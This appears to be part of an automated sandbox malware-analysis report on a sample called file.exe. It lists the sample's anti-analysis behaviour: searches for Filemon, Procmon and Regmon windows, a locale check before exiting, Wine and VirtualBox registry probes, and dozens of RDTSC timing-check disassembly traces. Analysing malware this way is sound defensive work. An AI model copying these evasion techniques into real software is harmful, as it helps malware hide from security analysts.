                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00989BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37499
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E278 second address: C5E27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E27C second address: C5E280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE1EE second address: DDE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE1F2 second address: DDE1F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE1F6 second address: DDE208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FE478BEC54Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD49F second address: DDD4AB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD638 second address: DDD646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD646 second address: DDD64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD64C second address: DDD650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD650 second address: DDD654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD8E4 second address: DDD914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE478BEC54Eh 0x0000000e jmp 00007FE478BEC553h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD914 second address: DDD929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FE478F58EB6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE093B second address: DE0959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0959 second address: DE095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0A98 second address: DE0B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007FE478BEC550h 0x0000000e pop edi 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FE478BEC548h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a or edx, 40FD5098h 0x00000030 mov esi, eax 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FE478BEC548h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push 19EFB841h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push esi 0x00000057 pop esi 0x00000058 jmp 00007FE478BEC553h 0x0000005d popad 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0B1D second address: DE0B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 19EFB8C1h 0x00000010 mov edi, dword ptr [ebp+122D369Bh] 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D1C88h], edi 0x0000001e cld 0x0000001f push 00000000h 0x00000021 and ch, FFFFFF86h 0x00000024 push 00000003h 0x00000026 jc 00007FE478F58EB8h 0x0000002c mov edx, ebx 0x0000002e push 611CB480h 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FE478F58EC0h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0C83 second address: DE0C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0C87 second address: DE0CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE478F58EC7h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FE478F58EC1h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jo 00007FE478F58EB6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0CC7 second address: DE0CDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0CDC second address: DE0CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0CE2 second address: DE0CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0CE6 second address: DE0CFE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0CFE second address: DE0D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a js 00007FE478BEC548h 0x00000010 push 00000003h 0x00000012 mov edx, ebx 0x00000014 push 00000000h 0x00000016 jmp 00007FE478BEC54Bh 0x0000001b push 00000003h 0x0000001d jmp 00007FE478BEC54Fh 0x00000022 call 00007FE478BEC549h 0x00000027 jo 00007FE478BEC562h 0x0000002d jno 00007FE478BEC55Ch 0x00000033 push eax 0x00000034 pushad 0x00000035 push ecx 0x00000036 jmp 00007FE478BEC557h 0x0000003b pop ecx 0x0000003c push ebx 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 popad 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0D9B second address: DE0D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0D9F second address: DE0DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0DA3 second address: DE0DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0DA9 second address: DE0DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0DB7 second address: DE0DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FE478F58EC8h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jns 00007FE478F58EC4h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0DE7 second address: DE0DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF163 second address: DFF167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF167 second address: DFF181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478BEC554h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF458 second address: DFF475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EC9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF475 second address: DFF484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF609 second address: DFF60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF925 second address: DFF932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFA81 second address: DFFA87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFA87 second address: DFFA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFBC8 second address: DFFBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFD54 second address: DFFD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE478BEC546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFD60 second address: DFFD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E001E4 second address: E001EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E001EA second address: E001EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6682 second address: DF6686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6686 second address: DF668C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF668C second address: DF66A4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478BEC54Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE478BEC546h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E00D03 second address: E00D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E011C5 second address: E0120F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Dh 0x00000007 push eax 0x00000008 ja 00007FE478BEC546h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE478BEC553h 0x00000020 jmp 00007FE478BEC554h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0120F second address: E01213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E01213 second address: E0121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06A01 second address: E06A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07D0D second address: E07D23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FE478BEC546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FE478BEC546h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07D23 second address: E07D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC66AA second address: DC66CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FE478BEC546h 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007FE478BEC54Ch 0x00000013 je 00007FE478BEC546h 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC66CB second address: DC66D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC66D1 second address: DC66D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC66D5 second address: DC66DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD20 second address: E0BD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD26 second address: E0BD2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD2A second address: E0BD5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE478BEC554h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE478BEC558h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD5C second address: E0BD70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478F58EBAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD70 second address: E0BD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD74 second address: E0BD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD78 second address: E0BD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE478BEC54Fh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BD95 second address: E0BDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 js 00007FE478F58EB6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BF27 second address: E0BF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC558h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BF43 second address: E0BF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BF47 second address: E0BF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0BF51 second address: E0BF55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C125 second address: E0C135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007FE478BEC546h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C135 second address: E0C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C13B second address: E0C141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C141 second address: E0C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE478F58EB6h 0x0000000d jmp 00007FE478F58EC1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C15F second address: E0C163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C163 second address: E0C169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C45F second address: E0C46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007FE478BEC546h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C46E second address: E0C481 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FE478F58EBEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0C799 second address: E0C7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478BEC554h 0x00000009 pop ecx 0x0000000a jbe 00007FE478BEC552h 0x00000010 jp 00007FE478BEC546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E40E second address: E0E412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E412 second address: E0E41D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E494 second address: E0E49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E65F second address: E0E67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE478BEC555h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E67E second address: E0E684 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E684 second address: E0E689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F2F6 second address: E0F2FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F2FC second address: E0F320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE478BEC546h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E104AC second address: E104B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12C0C second address: E12C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E12C15 second address: E12C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E140AE second address: E140E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE478BEC551h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push ebx 0x00000014 or edi, dword ptr [ebp+122D1F5Eh] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f mov esi, 2BD0D82Dh 0x00000024 push eax 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E140E3 second address: E140E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
